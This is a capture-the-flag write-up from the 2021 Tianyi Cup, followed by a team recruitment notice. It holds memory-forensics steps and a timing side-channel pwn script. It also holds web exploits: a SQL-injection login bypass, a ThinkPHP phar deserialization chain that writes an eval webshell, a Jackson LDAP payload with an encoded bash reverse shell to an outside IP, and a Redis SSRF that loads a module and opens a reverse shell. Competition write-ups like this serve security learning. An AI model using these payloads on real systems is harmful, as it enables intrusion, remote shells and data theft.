2021 second Tianyi cup ctf

Misc

Sign in

Group announcement
FLAG
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}

Browser

First get
1. Default browser (please provide the corresponding value in the registry that can prove that it is the default browser, such as IE.HTTP)
Generally in the registry, patiently turn over

./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880

http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml

See the address appended to the registry

Then search the registry of win7
"Software\Microsoft\windows\Shell\Associations\UrlAssociations\http\Userchoice"


./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q
0x000000007da2abf0 -D ./


Download and import navicat

In descending order, and then you can see
https://weibo.com/login.php
Splicing
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
Get flag

Pwn

ezshell

from pwn import *
elf=ELF('./chall')
EXCV = context.binary = './chall'
context.arch='amd64'
def pwn(p, idx, c):
# open
shellcode = '''
push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xor
esi, esi;
open:
push 2; pop rax; syscall;
cmp al,0x4
jl open
'''
# re open, rax => 0x14
# read(rax, 0x10050, 0x50)
shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;
pop rsi;add rsi,rbx; syscall;"
# cmp and jz
if idx == 0:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,
c)
else:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,
c)
shellcode = asm(shellcode)
p.recvuntil('======== Input your secret code ========\n')
p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')
idx = 0
var_list = []
while(1):
for c in range(32, 127):
p = remote("47.104.169.149",25178)
# p=process('./chall')
pwn(p, idx, c)
start = time.time()
try:
p.recv(timeout=2)
except:
pass
end = time.time()
p.close()
if end-start > 1.5:
var_list.append(c)
print("".join([chr(i) for i in var_list]))
break
else:
print("".join([chr(i) for i in var_list]))
break
idx = idx + 1
print("".join([chr(i) for i in var_list]))

Web

eztp

www.zip source code disclosure

POST /public/ HTTP/1.1
Host: 8.134.37.86:26846
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0)
Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://8.134.37.86:26846
Connection: close
Referer: http://8.134.37.86:26846/public/index.php
Cookie: PHPSESSID=7la556p4v160a8j1nhcholth1d
username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)
union select 1,1#&password=1

Inject login into the background
POP chain

<?php
namespace think {
abstract class Model
{
protected $append;
protected $error;
public $parent;
}
}
namespace think\model {
use think\db\Query;
use think\Model;
use think\model\relation\HasOne;
use think\console\Output;
abstract class Relation
{
protected $query;
protected $selfRelation;
protected $parent;
protected $foreignKey;
protected $localKey;
}
class Pivot extends Model
{
public function __construct()
{
$this->append = ['mb' => 'getError'];
$this->error = new HasOne();
$this->parent = new Output();
}
}
}
namespace think\session\driver {
use think\cache\driver\File;
class Memcached
{
protected $handler;
public function __construct()
{
$this->handler = new File();
}
}
}
namespace think\cache\driver {
class File
{
protected $options;
protected $tag;
function __construct()
{
$this->options = [
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../
../../../var/www/html/public/uploads/a.php',
'data_compress' => false,
];
$this->tag = 1;
}
}
}
namespace think\db {
use think\console\Output;
class Query
{
protected $model;
public function __construct()
{
$this->model = new Output();
}
}
}
namespace think\console {
use think\session\driver\Memcached;
class Output
{
protected $styles;
private $handle;
public function __construct()
{
$this->styles = ['where'];
$this->handle = new Memcached();
}
}
}
namespace think\model\relation {
use think\Model\Relation;
use think\db\Query;
use think\console\Output;
abstract class OneToOne extends Relation
{
protected $bindAttr;
}
class HasOne extends OneToOne
{
public function __construct()
{
$this->selfRelation = 0;
$this->query = new Output();
$this->bindAttr = ['ccc', 'ccc'];
$this->foreignKey = 'ccc';
$o = new \stdClass();
$o->mb = 'ccc';
$this->parent = $o;
$this->localKey = 'mb';
}
}
}
namespace think\process\pipes {
use think\model\Pivot;
class Windows
{
private $files;
public function __construct()
{
$this->files = [new Pivot()];
}
}
}
namespace {
use think\process\pipes\Windows;
// echo urlencode(base64_encode(serialize(new Windows())));
$phar = new Phar("exp.phar"); //Suffix must be phar
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
$object = new Windows();
$phar->setMetadata($object); //Save the customized meta data into the manifest
$phar->addFromString("1.php", ""); //Add files to compress
//Automatic signature calculation
$phar->stopBuffering();
rename("exp.phar", "exp.jpg");
}

Upload phar file
Trigger phar deserialization using listpic routing

http://8.134.37.86:24954/public/?
s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg

Read flag after writing to shell

jackson

Peanut shell setting intranet penetration arrangement malicious ldap service

use exploit LDAPLocalChainListener
use payload CommonsCollections8
use bullet TransformerBullet
set lport 9001
set version 3
set args 'set args 'bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-
d}|{bash,-i}''
run

ysomap directly uses the payload above
Transfer to the server and connect to the shell

easy_eval

Deserialization

<?php
class a{
public $code = "system('cat /*;id');";
function __construct($code)
{
$this->code = $code;
}
}
class b{
function __construct($code)
{
$this->a = new a($code);
}
function __destruct(){
echo $this->a->a();
}
}
$c = new b('eval($_REQUEST[0]);');
echo serialize($c);

Upload the so extension of redis to the / tmp directory
Start ssrf with fsockopen and call redis

<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "$link";
//$out = "GET $link HTTP/1.1\r\n";
//$out .= "HOST $host \r\n";
//$out .= "Connection: Close\r\n\r\n";
//$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 121.196.165.115 6663\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));


Tip

Do you want to join a security team
Have a better learning atmosphere?

Then join EDI security. The threshold here is not very high, but the masters are experienced and can take you from the foundation, as long as you have the determination to make persistent efforts.

EDI safe CTF team often participates in major CTF competitions and understands CTF competitions. We are working hard to create a good technical atmosphere in the safety circle. This is definitely a good place for you to learn technology. The threshold here is not very high, but the masters are experienced and can start with you from the foundation. As long as you have the determination to make persistent efforts, the next CTF bull is you.

Welcome to Xiaobai. Let's play CTF together and make progress together.

We're digging. We won't let you bury it!

Your joining can bring us new vitality, and we can also give you unlimited development space.

If you are interested, please contact the email root@edisec.net (bring your resume, including your learning direction, learning experience, etc.)

Tags: security Web Security

Posted by vaanil on Sat, 25 Sep 2021 15:57:00 +0530